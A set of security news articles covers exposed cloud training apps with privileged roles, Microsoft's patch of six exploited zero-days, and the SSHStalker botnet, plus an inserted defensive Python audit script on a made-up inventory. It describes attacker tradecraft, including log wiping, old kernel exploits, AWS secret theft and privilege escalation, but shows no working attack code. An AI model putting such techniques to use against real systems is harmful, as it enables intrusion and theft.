Pentera Labs research found that these applications were often deployed with default configurations, minimal isolation, and overly permissive cloud roles. The investigation uncovered that many of these exposed training environments were directly connected to active cloud identities and privileged roles, enabling attackers to move far beyond the vulnerable applications themselves and potentially into the customer’s broader cloud infrastructure. In these scenarios, a single exposed training application can act as an initial foothold. Once attackers are able to leverage connected cloud identities and privileged roles, they are no longer constrained to the original application or host. Instead, they may gain the ability to interact with other resources within the same cloud environment, significantly increasing the scope and potential impact of the compromise.

As part of the investigation, Pentera Labs verified nearly 2,000 live, exposed training application instances, with close to 60% hosted on customer-managed infrastructure running on AWS, Azure, or GCP.

Evidence of Active Exploitation

The exposed training environments identified during the research were not simply misconfigured. Pentera Labs observed clear evidence that attackers were actively exploiting this exposure in the wild. Across the broader dataset of exposed training applications, approximately 20% of instances were found to contain artifacts deployed by malicious actors, including crypto-mining activity, webshells, and persistence mechanisms. These artifacts indicated prior compromise and ongoing abuse of exposed systems. The presence of active crypto-mining and persistence tooling demonstrates that exposed training applications are not only discoverable but are already being exploited at scale.

Scope of Impact

The exposed and exploited environments identified during the research were not limited to small or isolated test systems. Pentera Labs observed this deployment pattern across cloud environments associated with Fortune 500 organizations and leading cybersecurity vendors, including Palo Alto, F5, and Cloudflare. While individual environments varied, the underlying pattern remained consistent: a training or demo application deployed without sufficient isolation, left publicly accessible, and connected to privileged cloud identities.

Why This Matters

Training and demo environments are frequently treated as low-risk or temporary assets. As a result, they are often excluded from standard security monitoring, access reviews, and lifecycle management processes.

Over time, these environments may remain exposed long after their original purpose has passed. The research shows that exploitation does not require zero-day vulnerabilities or advanced attack techniques. Default credentials, known weaknesses, and public exposure were sufficient to turn training applications into an entry point for broader cloud access. Labeling an environment as “training” or “test” does not reduce its risk. When exposed to the internet and connected to privileged cloud identities, these systems become part of the organization’s effective attack surface.

Refer to the full Pentera Labs research blog & join a live webinar on Feb 12th to learn more about the methodology, discovery process, and real-world exploitation observed during this research.

This article was written by Noam Yaffe, Senior Security Researcher at Pentera Labs. For questions or discussion, contact labs@pentera.io.

This article is a contributed piece from one of our valued partners.
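One way to audit for the pattern this article describes (a training application that is publicly reachable and attached to a broadly privileged cloud identity), shown as an added example that is not part of the original article or Pentera's tooling. The inventory layout, asset names and marker strings are assumptions made for illustration; only the role policies follow a real format, the AWS IAM JSON policy grammar.

```python
# Substrings for the training applications the article names (assumed spellings).
TRAINING_MARKERS = ("juice-shop", "juiceshop", "dvwa", "hackazon", "bwapp")
OPEN_CIDRS = {"0.0.0.0/0", "::/0"}

# Constructed inventory; the record layout is this example's own schema.
INVENTORY = [
    {"name": "sec-training-juice-shop", "image": "juice-shop:latest",
     "ingress": [{"port": 3000, "cidr": "0.0.0.0/0"}],
     "role_policy": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    {"name": "dvwa-lab", "image": "dvwa:1.0",
     "ingress": [{"port": 80, "cidr": "10.20.0.0/16"}],
     "role_policy": {"Version": "2012-10-17", "Statement": {
         "Effect": "Allow", "Action": ["s3:GetObject"],
         "Resource": "arn:aws:s3:::lab-fixtures/*"}}},
    {"name": "demo-bwapp", "image": "bwapp:2.2",
     "ingress": [{"port": 443, "cidr": "::/0"}],
     "role_policy": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Deny", "Action": "*", "Resource": "*"},
         {"Effect": "Allow", "Action": ["logs:PutLogEvents"], "Resource": "*"}]}},
    {"name": "billing-api", "image": "billing:4.1",
     "ingress": [{"port": 443, "cidr": "0.0.0.0/0"}],
     "role_policy": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": "s3:*", "Resource": "*"}]}},
]


def as_list(value):
    """IAM allows a single item or a list for Statement, Action and Resource."""
    return value if isinstance(value, list) else [value]


def broad_statements(policy):
    """Allow statements granting '*' or 'service:*' on every resource.

    Deny overrides, NotAction and conditions are not evaluated here.
    """
    broad = []
    for stmt in as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = as_list(stmt.get("Action", []))
        resources = as_list(stmt.get("Resource", []))
        wide_action = any(a == "*" or a.endswith(":*") for a in actions)
        if wide_action and "*" in resources:
            broad.append(stmt)
    return broad


def audit(inventory):
    """Report training assets that are public, over-privileged, or both."""
    findings = []
    for asset in inventory:
        label = f'{asset["name"]} {asset["image"]}'.lower()
        if not any(marker in label for marker in TRAINING_MARKERS):
            continue
        reasons = []
        if any(rule["cidr"] in OPEN_CIDRS for rule in asset["ingress"]):
            reasons.append("public-ingress")
        if broad_statements(asset["role_policy"]):
            reasons.append("broad-role")
        if reasons:
            severity = "critical" if len(reasons) == 2 else "review"
            findings.append({"name": asset["name"], "reasons": reasons,
                             "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in audit(INVENTORY):
        print(finding)
```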

Microsoft Patches 59 Vulnerabilities Including Six Actively Exploited Zero-Days

Microsoft on Tuesday released security updates to address a set of 59 flaws across its software, including six vulnerabilities that it said have been exploited in the wild. Of the 59 flaws, five are rated Critical, 52 are rated Important, and two are rated Moderate in severity. Twenty-five of the patched vulnerabilities have been classified as privilege escalation, followed by remote code execution (12), spoofing (7), information disclosure (6), security feature bypass (5), denial-of-service (3), and cross-site scripting (1).

It’s worth noting that the patches are in addition to three security flaws that Microsoft has addressed in its Edge browser since the release of the January 2026 Patch Tuesday update, including a Moderate vulnerability impacting the Edge browser for Android (CVE-2026-0391, CVSS score: 6.5) that could allow an unauthorized attacker to perform spoofing over a network by taking advantage of a “user interface misrepresentation of critical information.”

Topping the list of this month’s updates are six vulnerabilities that have been flagged as actively exploited:

- CVE-2026-21510 (CVSS score: 8.8) - A protection mechanism failure in Windows Shell that allows an unauthorized attacker to bypass a security feature over a network.
- CVE-2026-21513 (CVSS score: 8.8) - A protection mechanism failure in MSHTML Framework that allows an unauthorized attacker to bypass a security feature over a network.
- CVE-2026-21514 (CVSS score: 7.8) - A reliance on untrusted inputs in a security decision in Microsoft Office Word that allows an unauthorized attacker to bypass a security feature locally.
- CVE-2026-21519 (CVSS score: 7.8) - An access of resource using incompatible type (‘type confusion’) in the Desktop Window Manager that allows an authorized attacker to elevate privileges locally.
- CVE-2026-21525 (CVSS score: 6.2) - A null pointer dereference in Windows Remote Access Connection Manager that allows an unauthorized attacker to deny service locally.
- CVE-2026-21533 (CVSS score: 7.8) - An improper privilege management in Windows Remote Desktop that allows an authorized attacker to elevate privileges locally.

Microsoft’s own security teams and Google Threat Intelligence Group (GTIG) have been credited with discovering and reporting the first three flaws, which have been listed as publicly known at the time of release. There are currently no details on how the vulnerabilities are being exploited, and if they were weaponized as part of the same campaign.

“CVE-2026-21513 is a security feature bypass vulnerability in the Microsoft MSHTML Framework, a core component used by Windows and multiple applications to render HTML content,” Jack Bicer, director of vulnerability research at Action1, said.

“It is caused by a protection mechanism failure that allows attackers to bypass execution prompts when users interact with malicious files. A crafted file can silently bypass Windows security prompts and trigger dangerous actions with a single click.”

Satnam Narang, senior staff research engineer at Tenable, said CVE-2026-21513 and CVE-2026-21514 bear a “lot of similarities” to CVE-2026-21510, the main difference being that CVE-2026-21513 can also be exploited using an HTML file, while CVE-2026-21514 can only be exploited using a Microsoft Office file. As for CVE-2026-21525, it’s linked to a zero-day that ACROS Security’s 0patch service said it discovered in December 2025 while investigating another related flaw in the same component (CVE-2025-59230).

“These [CVE-2026-21519 and CVE-2026-21533] are local privilege escalation vulnerabilities, which means an attacker must have already gained access to a vulnerable host,” Kev Breen, senior director of cyber threat research at Immersive, told The Hacker News via email. “This could occur through a malicious attachment, a remote code execution vulnerability, or lateral movement from another compromised system.” “Once on the host, the attacker can use these escalation vulnerabilities to elevate privileges to SYSTEM. With this level of access, a threat actor could disable security tooling, deploy additional malware, or, in worst-case scenarios, access secrets or credentials that could lead to full domain compromise.”

Cybersecurity vendor CrowdStrike, which has been acknowledged for reporting CVE-2026-21533, said it does not attribute the exploitation activity to a specific adversary, but noted that threat actors in possession of the exploit binaries will likely ramp up their efforts to use or sell them in the near term. “The CVE-2026-21533 exploit binary modifies a service configuration key, replacing it with an attacker-controlled key, which could enable adversaries to escalate privileges to add a new user to the Administrator group,” Adam Meyers, head of Counter Adversary Operations at CrowdStrike, told The Hacker News in an emailed statement.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add all six vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by March 3, 2026.

The update also coincides with Microsoft rolling out updated Secure Boot certificates to replace the original 2011 certificates that will expire in late June 2026. The new certificates will be installed through the regular monthly Windows update process without any additional action. “If a device does not receive the new Secure Boot certificates before the 2011 certificates expire, the PC will continue to function normally, and existing software will keep running,” the tech giant said.

“However, the device will enter a degraded security state that limits its ability to receive future boot-level protections.” “As new boot‑level vulnerabilities are discovered, affected systems become increasingly exposed because they can no longer install new mitigations. Over time, this may also lead to compatibility issues, as newer operating systems, firmware, hardware, or Secure Boot–dependent software may fail to load.”

In tandem, the company said it’s also strengthening default protections in Windows through two security initiatives, Windows Baseline Security Mode and User Transparency and Consent. The updates come under the purview of the Secure Future Initiative and Windows Resiliency Initiative. “With Windows Baseline Security Mode, Windows will move toward operating with runtime integrity safeguards enabled by default,” it noted. “These safeguards ensure that only properly signed apps, services, and drivers are allowed to run, helping to protect the system from tampering or unauthorized changes.”

User Transparency and Consent, analogous to the Apple macOS Transparency, Consent, and Control (TCC) framework, aims to introduce a consistent approach to handling security decisions. The operating system will prompt users when apps try to access sensitive resources, such as files, the camera, or the microphone, or when they attempt to install other unintended software. “These prompts are designed to be clear and actionable, and you’ll always have the ability to review and change your choices later,” Logan Iyer, Distinguished Engineer at Microsoft, said. “Apps and AI agents will also be expected to meet higher transparency standards, giving both users and IT administrators better visibility into their behaviors.”

SSHStalker Botnet Uses IRC C2 to Control Linux Systems via Legacy Kernel Exploits

Cybersecurity researchers have disclosed details of a new botnet operation called SSHStalker that relies on the Internet Relay Chat (IRC) communication protocol for command-and-control (C2) purposes. “The toolset blends stealth helpers with legacy-era Linux exploitation: Alongside log cleaners (utmp/wtmp/lastlog tampering) and rootkit-class artifacts, the actor keeps a large back-catalog of Linux 2.6.x-era exploits (2009–2010 CVEs),” cybersecurity company Flare said. “These are low value against modern stacks, but remain effective against ‘forgotten’ infrastructure and long-tail legacy environments.”

SSHStalker combines IRC botnet mechanics with an automated mass-compromise operation that uses an SSH scanner and other readily available scanners to co-opt susceptible systems into a network and enroll them in IRC channels. However, unlike other campaigns that typically leverage such botnets for opportunistic efforts like distributed denial-of-service (DDoS) attacks, proxyjacking, or cryptocurrency mining, SSHStalker has been found to maintain persistent access without any follow-on post-exploitation behavior.

This dormant behavior sets it apart, raising the possibility that the compromised infrastructure is being used for staging, testing, or strategic access retention for future use. A core component of SSHStalker is a Golang scanner that scans port 22 for servers with open SSH in order to extend its reach in a worm-like fashion. Also dropped are several payloads, including variants of an IRC-controlled bot and a Perl file bot that connects to an UnrealIRCd IRC Server, joins a control channel, and waits for commands that allow it to carry out flood-style traffic attacks and commandeer the bots. The attacks are also characterized by the execution of C program files to clean SSH connection logs and erase traces of malicious activity from logs to reduce forensic visibility.

Furthermore, the malware toolkit contains a “keep-alive” component that ensures the main malware process is relaunched within 60 seconds in the event it’s terminated by a security tool. SSHStalker is notable for blending mass compromise automation with a catalog of 16 distinct vulnerabilities impacting the Linux kernel, some going all the way back to 2009. Some of the flaws used in the exploit module are CVE-2009-2692, CVE-2009-2698, CVE-2010-3849, CVE-2010-1173, CVE-2009-2267, CVE-2009-2908, CVE-2009-3547, CVE-2010-2959, and CVE-2010-3437.

Flare’s investigation of the staging infrastructure associated with the threat actor has uncovered an extensive repository of open-source offensive tooling and previously published malware samples. These include:

- Rootkits to facilitate stealth and persistence
- Cryptocurrency miners
- A Python script that executes a binary called “website grabber” to steal exposed Amazon Web Services (AWS) secrets from targeted websites
- EnergyMech, an IRC bot that provides C2 and remote command execution capabilities

It’s suspected that the threat actor behind the activity could be of Romanian origin, given the presence of “Romanian-style nicknames, slang patterns, and naming conventions inside IRC channels and configuration wordlists.” What’s more, the operational fingerprint exhibits strong overlaps with that of a hacking group known as Outlaw (aka Dota).

“SSHStalker does not appear to focus on novel exploit development but instead demonstrates operational control through mature implementation and orchestration, by primarily using C for core bot and low-level components, shell for orchestration and persistence, and limited Python and Perl usage mainly for utility or supporting automation tasks inside the attack chain and running the IRCbot,” Flare said. “The threat actor is not developing zero-days or novel rootkits, but demonstrating strong operational discipline in mass compromise workflows, infrastructure recycling, and long-tail persistence across heterogeneous Linux environments.”